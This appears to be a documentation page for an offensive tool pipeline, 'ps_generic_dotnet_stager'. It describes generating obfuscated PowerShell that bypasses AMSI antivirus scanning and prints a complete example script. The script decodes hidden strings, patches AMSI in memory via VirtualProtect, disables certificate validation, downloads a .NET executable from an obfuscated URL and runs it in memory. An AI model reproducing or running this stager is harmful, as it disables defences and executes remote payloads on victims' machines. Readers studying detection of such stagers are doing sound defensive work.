ps_generic_dotnet_stager

Description

Generates an obfuscated PowerShell script and AMSI bypass to suppress AV interference before downloading and running a .NET executable in memory.

Overview

The purpose of this pipeline is to enable the download and execution of any .NET executable in such a way that the executable hosted at the specified URL does not require any obfuscation or modification. Simply run this pipeline with the URL where the .NET executable is being hosted.

Parameters

Parameter Name Type Description
URL string The URL to load the .NET module from. This parameter is mandatory.
BypassTechnique string The specific AMSI bypass technique to use. Options: ‘PatchInMemory’, ‘PatchScanContent’, ‘AmsiScanBufferStringReplace’. Default: ‘AmsiScanBufferStringReplace’.

Example Output

function Push-Removing {
    param(
        [Parameter(Mandatory = $true, Position = 0)]
        [string]$Value,

        [Parameter(Mandatory = $true, Position = 1)]
        [int]$Offset
    )

    $srxenv = [System.Convert]::FromBase64String($Value);
    for($list = 0; $list -lt $srxenv.Length; $list++) {
        $config = $srxenv[$list] - $Offset;
        if($config -lt 0) {
            $config += 256;
        }
        $srxenv[$list] = $config;
    }

    [System.Text.Encoding]::UTF8.GetString($srxenv);
}
New-Alias (Push-Removing 'YImPgI1IboSIkId8j4SKiY4=' 27) (Push-Removing 'eJubZIuwp5w=' 55)
if($PSVersionTable.PSVersion.Major -gt 2) {
    $packageargs = New-Object System.Reflection.AssemblyName(([string](Push-Removing 'XG5zODc=' 5)))
    $key = [AppDomain]::CurrentDomain.DefineDynamicAssembly($packageargs, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $action = $key.DefineDynamicModule(([string](Push-Removing 'kKKnbGs=' 57)), $False)

    $source = $action.DefineType(([string](Push-Removing 'pbe8gYB8mbPAvLO6gYA=' 78)), ([string](Push-Removing 'wufU3tvVnpK13tPl5Q==' 114)))
    $filter = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
    $uri = [Runtime.InteropServices.DllImportAttribute].GetField(([string](Push-Removing '7gAP5/wOD+ANDQoN' 155)))
    $context = New-Object Reflection.Emit.CustomAttributeBuilder($filter,
        ([string](Push-Removing 'V1FeWlFYHx4aUFhY' 236)),
        [Reflection.FieldInfo[]]@($uri),
        @($True))

    
    $ret = $source.DefinePInvokeMethod(([string](Push-Removing '0uXu8PHd6Mzu6/Dh3/A=' 124)),
        ([string](Push-Removing 'c216dm10Ozo2bHR0' 8)),
        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
        [Reflection.CallingConventions]::Standard,
        [IntPtr],
        [Type[]]@([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    $ret.SetCustomAttribute($context)

    $index = $source.CreateType()

    $currentpath = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(([string](Push-Removing 'PT0=' 225)))[-1].Equals(([string](Push-Removing 'p83HyLnBgrjAwA==' 84))) }
    $p = $currentpath.GetType(([string](Push-Removing 'y+fh8O3x7eTyrNXn7LGwrNPs8d/k48zf8uf048vj8ubt4vE=' 126)))
    $passthru = $p.GetMethod(([string](Push-Removing 'HDpJIkQ5SkE6HTZDOUE6' 213)))
    $match = $p.GetMethod(([string](Push-Removing 'OVdmQmRhVTNWVmRXZWU=' 242)), [reflection.bindingflags] ([string](Push-Removing 'rNG+yMW/iK/QvdDFvw==' 92)), $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
    $i = $passthru.Invoke($null, ([string](Push-Removing 'KjY8MvctNTU=' 201)))
    $folder = New-Object IntPtr
    $n = New-Object System.Runtime.InteropServices.HandleRef($folder, $i)
    $ip = Push-Removing 'DjpANiAw' 205
    $obj = Push-Removing 'NUIWSTo6OUY=' 212
    $user = $match.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$n,($ip + $obj)))


    $timeout = 0
    [void]$index::VirtualProtect($user, [UInt32]5, 0x40, [ref]$timeout)
    $logpath = [Byte[]](12, 22, 2, 17, 18, 11)
    $text = [Byte[]](196, 109, 2, 24, 146, 206)
    for($cmd = 0; $cmd -lt $text.Length; $cmd++) {
        $text[$cmd] -= $logpath[$cmd]
    }
    [System.Runtime.InteropServices.Marshal]::Copy($text, 0, $user, 6)
}
Enter-Simulations (Push-Removing 'n52TmJFKfaOdno+XWHiPnmU3NJ+dk5iRSn2jnZ6Pl1h4j55YfY+Nn5yTnqNlNzSfnZOYkUp9o52ej5dYfY+Nn5yTnqNYbZyjmp6ZkZyLmpKjWIJfWmNtj5yek5CTjYuej51lNzQ3NJqfjJaTjUqdnouek41KjZaLnZ1KbY+cnpOQk42Lno+Ai5aTjouemZxKpTc0SkpKSpqck6CLno9KnZ6LnpONSoyZmZZKeZiAi5aTjouej22PnJ6TkJONi56PUpmMlI+Nnkqdj5iOj5xWSoJfWmNtj5yek5CTjYuej0qNj5yek5CTjYuej1ZKgl9aY22Si5OYSo2Si5OYVkp9nZZ6mZaTjaNvnJyZnJ1KnZ2WepmWk42jb5ycmZydU0qlNzRKSkpKSkpKSpyPnp+cmEqenJ+PZTc0SkpKSqc3NDc0SkpKSpqfjJaTjUqdnouek41KoJmTjkp5oI+cnJOOj4CLlpOOi56TmZhSU0qlNzRKSkpKSkpKSn2PnKCTjY96mZOYnneLmIuRj5xYfY+coI+cbY+cnpOQk42Lno+Ai5aTjouek5mYbYuWloyLjZVKZ0ptj5yek5CTjYuej4CLlpOOi56ZnFh5mICLlpOOi56PbY+cnpOQk42Lno9lNzRKSkpKpzc0pw==' 42)
[CertificateValidator]::OverrideValidation();
$scope = New-Object System.Net.WebClient;
$function = $scope.DownloadData(([string](Push-Removing 'KjY2MjX88fE5OTnwKDEx8CUxL/EyIzsuMSMm8Cc6Jw==' 194)));
if($function -eq $null) {
    exit;
}

$apikey = [System.Reflection.Assembly]::Load($function);
$project = [string[]]@();
$apikey.EntryPoint.Invoke($null, $project);
Scroll to Top